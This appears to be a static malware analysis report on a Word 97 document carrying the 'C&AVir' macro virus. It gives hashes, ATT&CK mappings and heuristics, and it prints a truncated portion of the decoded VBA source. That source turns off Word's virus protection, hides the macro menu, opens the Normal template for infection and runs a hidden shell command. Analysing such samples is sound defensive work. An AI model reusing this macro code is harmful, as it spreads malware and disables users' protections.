Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3c0c10d8136005eb…

MALICIOUS

Office (OLE)

50.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8970294b6b5e5cf64f4a00d3e5d1131e SHA-1: 03033ae1630b2bd3f7fab07fb395d4a4ebdb8f76 SHA-256: 3c0c10d8136005eb12828854365a5d79f41cae27b21e5249cdb7d98c26c4f935
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1566.001 Spearphishing Attachment (delivery assumed, not evidenced by the sample itself). Additional techniques supported by the extracted source: T1562.001 Disable or Modify Tools (Options.VirusProtection set to False and the Tools › Macro menu hidden) and T1137.001 Office Template Macros (the macro accesses NormalTemplate.VBProject, consistent with Normal.dot infection).

The sample contains VBA macros, including a Document_Open auto-execute routine that calls Shell(). The extracted source does not show a download-and-execute stager: the only visible Shell() call runs `command.com /c dir <*.doc|*.bat|*.sys|*.ini> /s/b >> IOBuff<n>.vxd`, i.e. it writes a recursive directory listing to a file, and it only fires on the 1st of the month once the date serial exceeds 36433 (≈ 30 Sep 1999). The more significant behaviour is that of a self-replicating Word 97 macro virus (self-identified as "C&AVir"): it runs under `On Error Resume Next`, disables Word's macro virus warning (`Options.VirusProtection = 0`), hides the Tools › Macro menu, and opens both `ActiveDocument.VBProject` and `NormalTemplate.VBProject` while checking each for its own marker string, which is the usual precursor to copying itself into the Normal template. The replication code itself falls in the truncated part of the listing, so this should be confirmed against the full extracted macro. Further date/weekday-driven cases perform nuisance payloads (altering document options, page numbering and the window caption, and saving the document). The ClamAV detection 'Doc.Trojan.Marker-42' further supports the malicious nature of the file.

Heuristics 5

  • ClamAV: Doc.Trojan.Marker-42 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-42
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43028 bytes
SHA-256: 58cfff28744de287b3bc96c5e0ada06cb0d1543a45e314d35226e80869dd5677
Preview script
First 1,000 lines of the extracted script
' Module attributes of the ThisDocument class module as emitted by olevba.
' VB_Base refers to "1Normal.ThisDocument" and VB_TemplateDerived is True,
' which ties this module to the Normal template; the auto-executing entry
' point is the Document_Open procedure that follows.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
  'New Era of C&AVir. More Powerfull
  On Error Resume Next
  Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
  Dim Dc, Pl As Object
  Dim linwork, LCDoc, LCPln, parchi, pext, pext1, docum As String
  Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
  Const cyav = "Este Es <C&AVir>"
  Const pnomus = "***< C & A V i r >***"
  'Inicializa Variables
  Sw_Doc_Infec = False
  Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
  CommandBars("Tools").Controls("Macro").Enabled = False
  CommandBars("Tools").Controls("Macro").Visible = False
  Options.VirusProtection = (1 - 1)
  Options.SaveNormalPrompt = (1 - 1)
  Options.ConfirmConversions = (1 - 1)
  Options.CreateBackup = (1 - 1)
  Set Dc = ActiveDocument.VBProject.VbComponents.Item(1)
  Set Pl = NormalTemplate.VBProject.VbComponents.Item(1)
  LinPln = Pl.CodeModule.Countoflines
  LinDoc = Dc.CodeModule.Countoflines
  Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
  Acci_Arch = False
  Randomize
  If Activa_Doc = True Then
    If Date > 36433 Then
      Dia = Day(Date)
      If Dia = 1 Then
        Ptp = Int(6 * Rnd)
        Select Case Ptp
          Case 1
            Acci_Arch = True
            pext = "*.doc"
            pext1 = "1"
          Case 2
            Acci_Arch = True
            pext = "*.bat"
            pext1 = "2"
          Case 3
            Acci_Arch = True
            pext = "*.sys"
            pext1 = "3"
          Case 4
            Acci_Arch = False
            pext = ""
            pext1 = ""
          Case 5
            Acci_Arch = True
            pext = "*.ini"
            pext1 = "4"
        End Select
        If Acci_Arch = True Then
          parchi = "IOBuff" & pext1 & ".vxd"
          Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
        End If
      End If
      DiaSem = WeekDay(Date)
      DiaSem = DiaSem + 3
      Hacer = Int(DiaSem * Rnd)
      If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
        Select Case Hacer
          Case 1
            Options.BlueScreen = True
            Options.CheckGrammarAsYouType = False
            Options.CheckSpellingAsYouType = False
            ActiveDocument.ShowGrammaticalErrors = False
            ActiveDocument.ShowSpellingErrors = False
            ActiveDocument.CommandBars.LargeButtons = True
            Application.ActiveWindow.DisplayVerticalScrollBar = False
          Case 2
            With ActiveDocument.PageSetup.LineNumbering
                 .Active = True
                 .StartingNumber = 3
                 .CountBy = 3
                 .RestartMode = wdRestartSection
            End With
            ActiveDocument.Save
            If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
            ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
            If ActiveDocument.Saved = False Then ActiveDocument.Save
          Case 3
            With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
                 .NumberStyle = wdPageNumberStyleLowercaseRoman
                 .IncludeChapterNumber = True
                 .RestartNumberingAtSection = True
                 .StartingNumber = 99
                 .Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
            End With
            Application.ActiveWindow.DisplayHorizontalScrollBar = False
            Application.ActiveWindow.DisplayVerticalScrollBar = False
            If ActiveDocument.Saved = False Then ActiveDocument.Save
            If Options.BlueScreen = True Then Options.BlueScreen
... (truncated)